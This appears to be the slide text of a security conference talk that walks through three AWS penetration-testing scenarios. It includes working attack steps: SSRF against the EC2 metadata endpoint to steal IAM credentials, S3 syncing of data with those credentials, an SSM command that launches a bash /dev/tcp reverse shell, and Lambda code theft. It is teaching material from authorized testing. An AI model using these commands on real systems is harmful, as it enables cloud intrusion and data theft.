A collection of 3 scenarios from AWS penetration testing exercises over the years that cover mis-configurations and application security vulnerabilities that lead to shells on EC2 instances and access to other services beyond the plane of attack.
One of the OWASP Bangalore Chapter leaders along with Vandana and Prashant KV ☺ ▪ Several years of security experience in breaking things (Offensive Security) ▪ All kinds of things (applications/mobile/systems/networks/wireless/cloud) ▪ Love testing applications and infra on the cloud, learning new things everyday
to access to systems and data beyond the plane of attack ▪ Demos of 3 cool scenarios that we have encountered before that allowed us to gain access to servers and data by chaining multiple vulnerabilities ▪ Possibly, talk about mitigations, if time permits, and share other stories that you folks may have
3 scenarios ❑ code level vulnerability that allows access to data or execute code ❑ overly permissive policies assigned to roles used by accessible services ❑ the absence of logging that could have been used to otherwise stop the attacks after the initial foothold was obtained ❑ potentially sensitive data not encrypted at rest
CNAME, SOA and TXT. This can tell you a lot about the underlying apps, technology or how the external infra looks like dig NS galaxybutter.co dig CNAME @ns-296.awsdns-37.com www.galaxybutter.co dig TXT @ns-296.awsdns-37.com galaxybutter.co
a TCP SYN scan with script scanning, version detection and show only open ports. -g80 is used to set source port as one of the ways the nmap documentation tells us is a Firewall IDS evasion technique sudo nmap --open -Pn –top-ports 1000 -T4 -sS -g80 -sC -sV 54.211.12.132
do this. Personal favorite for quick results, is also one of the oldest tools written to do this - https://digi.ninja/projects/bucket_finder.php In the most simplistic formats, a dictionary of words is appended to the *.s3.amazonaws.com and the DNS A record is identified. Presence of an A record means bucket present. Alternatively, an HTTPS request is also made, a 404 means bucket not found. Anything else means bucket exists.
were discovered during the assessment Common AWS EC2 usernames were tried (ubuntu, ec2-user, root etc.) Were able to login into 1 server ssh -i sales-marketing-app.pem [email protected]
able to execute code or read files on linux ◦ Files inside the /home/* directory ◦ /etc/passwd ◦ /etc/hosts ◦ Files inside webroots if available ◦ /proc/environ More things to do here - https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation- Command-List
page was discovered. The application had the ability to register new users We registered a new user and logged in App’s functionality allowed users’ to provide a URL and make a web request on their behalf Essentially trusting user input with the URL that would be used to make a request from the server side
that occurs when a service makes a request (HTTP or otherwise) to an endpoint whose address is controlled by the user, without sanitisation or whitelisting. This user controlled request is made from the server. Can be used to ◦ make requests to internal applications/services ◦ Port scans using behaviour and responses of (lib)curl libraries ◦ On the cloud, access the metadata endpoint to retrieve EC2 instance information ◦ Perform denial of service attacks by making requests that will fetch large responses ◦ Perform code execution by overflowing vulnerable services using service specific payloads
… Virtual Machines on the cloud across AWS, GCP, Azure, DigitalOcean and others have an endpoint accessible only from the machine itself called the metadata endpoint This is accessible at http://169.254.169.254 Contains information about the machine, its cloud specific identifiers and user data that is attached EC2 instances can also have a IAM role attached to a machine, which causes a temporary set of credentials to become available from the metadata instance
URL using the application’s functionality leads to the name of the IAM role attached to the machine ◦ http://169.254.169.254/latest/meta-data/iam/security-credentials/ Accessing the IAM rolename generates temporary tokens that can be used to impersonate the EC2 instance ◦ http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2serverhealthrole
profile in AWS CLI aws configure --profile stolencreds Also, edited the ~/.aws/credentials file to include the value of the aws_session_token variable Checked if the creds are setup properly using aws sts get-caller-identity --profile stolencreds
that gave the creds the ability to perform actions beyond the EC2 instance aws s3 ls --profile stolencreds aws s3 ls s3://data.serverhealth-corporation --profile stolencreds aws s3 sync s3://data.serverhealth-corporation . --profile stolencreds
it is possible to execute commands and retrieve output using the AWS CLI or programmatically More about this - https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm- agent.html Basically, use the CLI to send a command to AWS service, an agent running on the instance is contacted, the command is run as root and the output is presented to another service endpoint
SSM, the user or IAM role whose credentials are being used must have the AmazonEC2RoleforSSM permission attached Also, the Amazon SSM Agent must be running on the instance. This is available in multiple Amazon Machine Images after November 2016 Commands can be executed using an API call and the output read via another API call Commands are run as a user called ssm-user who has sudoers rights on Linux and is in the Administrators localgroup on Windows images
called reverse-shell.sh and upload it to a public S3 bucket. This has to be an S3 bucket and cannot be any other hosting on the Internet. Edit the placeholders. #!/bin/bash bash -i >& /dev/tcp/IP-OF-REVERSE-SHELL-CATCHER/9999 0>&1 Run netcat to catch the reverse shell ◦ nc -lvp 9999 Run the following SSM command to get a reverse shell connect on the IP where nc is running ◦ aws ssm send-command --document-name "AWS-RunRemoteScript" --instance- ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL- SCRIPT\"}"],"commandLine":["/bin/bash reverse-shell.sh"]}' --query "Command.CommandId"
a static HTML site with functionality to upload files The site itself was hosted on S3 A quick review of the JS and by analysing the HTTP traffic using Burp, it became evident that the site was adding content to an S3 bucket How was the static site writing files to a bucket you ask?
were added to the AWS CLI as a different profile and a tool called ScoutSuite was run with the credentials to see what kind of access the IAM user had aws configure --profile uploadcreds Scoutsuite can be obtained from - https://github.com/nccgroup/ScoutSuite scout –profile uploadcreds This returned a complete picture of the AWS infrastructure because the user had the AdministratorAccess policy attached as a permission
lambda functions One of them performed a rudimentary function where it accepted user input and gave the md5sum of a string https://ntf9ood72h.execute-api.us-east-1.amazonaws.com/api/hello
that we now had, we downloaded the lambda for analysis - aws lambda list-functions --profile uploadcreds - aws lambda get-function --function-name lambda-name-here-from- previous-query --query 'Code.Location' --profile uploadcreds - wget -O lambda-function.zip url-from-previous-query --profile uploadcreds The downloaded zip contains the code for the lambda.
AWS account and found multiple machines aws ec2 describe-instances --profile uploadcreds As a proof of concept, we were able to show code execution on one of the servers using SSM as well as using the new EC2 instance connect short SSH access for AWS https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh- access-to-your-ec2-instances/ This is left as an exercise for the reader. The next slide has the command and the output.
evident now, the most common theme is the misconfiguration of services, insecure programming and permissions that should not have been ▪ Reconnaissance and OSINT is the key for a lot of cloud services and applications. When attacking apps and servers, it is important to identify key DNS, whois, IP history and sub-domain information ▪ Post exploitation has no limits with the cloud. You can attack additional services, disrupt logging, make code changes to attack users – Your imagination (and the agreement with your client) is the limit ☺ ▪ There are a ton of tools that security folks have written on GitHub and a lot of work is being done in the attack and exploitation areas. ▪ The key to learning to attack is to Setup > Break > Learn > Repeat